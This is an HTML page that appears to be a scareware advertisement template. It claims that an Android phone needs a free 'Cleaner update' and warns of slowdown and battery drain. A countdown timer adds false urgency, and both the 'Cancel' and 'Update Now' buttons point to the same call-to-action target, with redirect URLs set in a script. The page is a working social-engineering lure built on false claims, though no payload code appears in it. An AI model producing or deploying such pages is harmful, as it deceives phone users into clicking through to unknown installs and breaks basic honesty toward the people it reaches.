<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="robots" content="noindex, nofollow">
<meta name="theme-color" content="#999">
<meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="format-detection" content="telephone=no">
<meta name="HandheldFriendly" content="true">
<meta name="apple-touch-fullscreen" content="yes">
<title>Update recommended!</title>
<link href="main.css" rel="stylesheet" type="text/css">
<script>
    
        
    var sec = 59; // set the seconds
    var min = 05; // set the minutes
    function countDown() {
        sec--;
        if (sec == -01) {
            sec = 59;
            min = min - 1;
        } else {
            min = min;
        }

        if (sec <= 9) {
            sec = "0" + sec;
        }

        time = (min <= 9 ? "" + min : min) + " minutes " + sec + " seconds";

        if (document.getElementById) {
            document.getElementById('theTime').innerHTML = time;
        }

        SD = window.setTimeout(countDown, 1000);
        if (min == '00' && sec == '00') {
            sec = "00";
            window.clearTimeout(SD);
        }
    }
    window.onload = countDown;
</script>
</head>
<body class="en">
<div class="window text_wrap">
    <div class="ad">Ad</div>
    <div class="heads">
    <div class="text">
    Cleaner Update for <span class="device_brand">Android</span> is Recommended!<div class="close"></div>
    </div>
    </div>
    <div class="text">
    <p>Your phone <span class="device_name device_name1"></span> can work faster, we released a Cleaner update, and it is recommended for every phone.</p>
    <p>If you do not upgrade, your <span class="device_name">smartphone</span> might be slowed down and your battery may discharges quickly.</p>
    <p>Update now for <strong>FREE</strong> to clean and boost your <span class="device_brand">Android</span> immediately!</p>
    <p style="text-align:center;margin-top:10px;"><span style="font-size:15px;color:red;font-family:sans-serif;" id="theTime">5 minutes 14 seconds</span></p>
    </div>
    <div class="buttons">
        <a class="button cancel mainButton" style="font-weight: normal;" href="#CTA_BUTTON">Cancel</a>
        <a class="button install mainButton"  href="#CTA_BUTTON">Update Now</a>
    </div>
    
    </div>

    <script>
      var cta = 'mainButton';
      var back = 'https://google.com/#back';
      var under = 'https://google.com/#under';
    </script>
    <script src="script.js"></script>

</body>
</html>